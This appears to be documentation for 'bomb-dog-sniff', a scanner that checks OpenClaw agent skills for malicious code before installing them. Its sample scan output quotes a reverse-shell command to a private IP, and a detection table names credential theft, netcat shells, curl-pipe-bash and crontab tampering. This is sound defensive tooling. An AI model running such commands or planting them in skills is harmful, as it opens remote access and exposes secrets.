| Use when this capability is needed.
Like a bomb-sniffing dog for OpenClaw skills
Sniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.
# Sniff out threats before installing
openclaw skill bomb-dog-sniff scan ./downloaded-skill
# Safe install from clawhub (auto-downloads, sniffs, installs if clean)
openclaw skill bomb-dog-sniff safe-install cool-skill
# Audit an already-installed skill
openclaw skill bomb-dog-sniff audit bird
# Batch scan multiple skills
openclaw skill bomb-dog-sniff batch skills-to-audit.txt
Scan a skill directory for malicious patterns.
openclaw skill bomb-dog-sniff scan <path> [options]
Options:
-j, --json Output JSON only
-v, --verbose Show detailed findings
-t, --threshold N Set risk threshold (default: 40)
-h, --help Show help
Example:
openclaw skill bomb-dog-sniff scan ./untrusted-skill
openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json
Output:
🔍 Bomb-Dog-Sniff Security Scanner v1.2.0
Target: /home/user/skills/untrusted-skill
🔴 CRITICAL (2)
──────────────────────────────────────────────────
crypto_harvester: scripts/wallet.js:23
Crypto wallet private key harvesting detected
Code: const privateKey = "a1b2c3..."
Confidence: high
reverse_shell: scripts/backdoor.sh:5
Reverse shell or remote code execution detected
Code: bash -i >& /dev/tcp/192.168.1.100/4444
Confidence: high
🟠 HIGH (1)
──────────────────────────────────────────────────
pipe_bash: install.sh:12
Dangerous curl | bash pattern detected
Confidence: high
═══════════════════════════════════════════════════
SCAN SUMMARY
═══════════════════════════════════════════════════
☠️ Risk Score: 75/100
Risk Level: MALICIOUS
Duration: 125ms
Files Scanned: 12/15
Files Skipped: 3 (binary/empty/large)
Findings: 3
Severity Breakdown:
🔴 CRITICAL: 2
🟠 HIGH: 1
📋 Recommendation:
MALICIOUS - Do not install. Found 3 critical security issues.
Scan ID: bds-20260208-a1b2c3d4
Download from clawhub/GitHub, scan, and install only if safe.
openclaw skill bomb-dog-sniff safe-install <source> [options]
Source:
- ClawHub skill name: bird
- GitHub URL: https://github.com/user/skill
- Local path: ./local-skill
Options:
--threshold N Set risk threshold (default: 39)
--dry-run Scan only, don't install
--verbose Show all findings
Example:
# Install with default threshold (39)
openclaw skill bomb-dog-sniff safe-install bird
# Stricter threshold
openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20
# Scan only (dry run)
openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run
# GitHub source
openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill
Audit an already-installed skill.
openclaw skill bomb-dog-sniff audit <skill-name> [options]
Example:
openclaw skill bomb-dog-sniff audit notion
Scan multiple skills from a list file.
openclaw skill bomb-dog-sniff batch <list-file>
Example list file (skills.txt):
# My installed skills to audit
bird
notion
gog
slack
./custom-skill
# Commented lines are ignored
# old-skill
Run:
openclaw skill bomb-dog-sniff batch skills.txt
bomb-dog-sniff scans for these threat categories:
| Category | Severity | Examples Detected |
|---|---|---|
| crypto_harvester | CRITICAL | Private key extraction, wallet exports, mnemonic theft |
| credential_theft | CRITICAL | Environment variable exfiltration, config file theft, SSH key theft |
| reverse_shell | CRITICAL | Netcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code |
| keylogger | CRITICAL | Keyboard capture with exfiltration, clipboard theft, password field monitoring |
| encoded_payload | HIGH | Base64 execution chains, hex escapes with eval context, obfuscated code |
| suspicious_api | HIGH | Pastebin/ngrok/webhook destinations, dynamic URL construction with secrets |
| pipe_bash | HIGH | curl | bash, wget | sh patterns |
| deposit_scam | HIGH | "Send ETH to 0x...", payment prompts in unexpected contexts |
| supply_chain | HIGH | Typosquatting, dynamic requires, suspicious postinstall scripts |
| prototype_pollution | HIGH | Dangerous object merging, __proto__ manipulation |
| malicious_script | CRITICAL | Pre/postinstall doing network/exec operations, modifying other packages |
| network_exfil | MEDIUM | File reading followed by network transmission |
| file_tamper | CRITICAL | .bashrc modification, crontab editing, SSH authorized_keys manipulation |
0-19 SAFE ✅ Install freely
20-39 LOW ⚠️ Review recommended
40-69 SUSPICIOUS 🚫 Blocked by default
70-100 MALICIOUS ☠️ Never install
Each finding adds to the score:
Confidence multipliers:
Score caps at 100.
1. QUARANTINE
└── Skill downloaded to /tmp/bds-q-<random>/
└── Randomized, non-predictable directory name
└── Restricted permissions (0o700)
2. SCAN
├── Check all files against detection patterns
├── Skip binary files, empty files, files >10MB
├── Calculate entropy for encoded payload detection
├── Apply confidence multipliers
└── Generate findings report
3. DECISION
├── Risk > threshold? → BLOCK & DELETE
└── Risk ≤ threshold? → PROCEED
4. INSTALL (if passed)
└── Move from quarantine to skills directory
└── Backup existing installation (max 5 backups)
5. CLEANUP
└── Securely remove quarantine directory
# Set custom skills directory
export OPENCLAW_SKILLS_DIR=/path/to/skills
# Set default risk threshold
export BOMB_DOG_THRESHOLD=25
Add to your skill's package.json:
{
"bomb-dog-sniff": {
"riskThreshold": 25,
"excludedCategories": ["network_exfil"]
}
}
Add to your CI pipeline:
# .github/workflows/skill-security.yml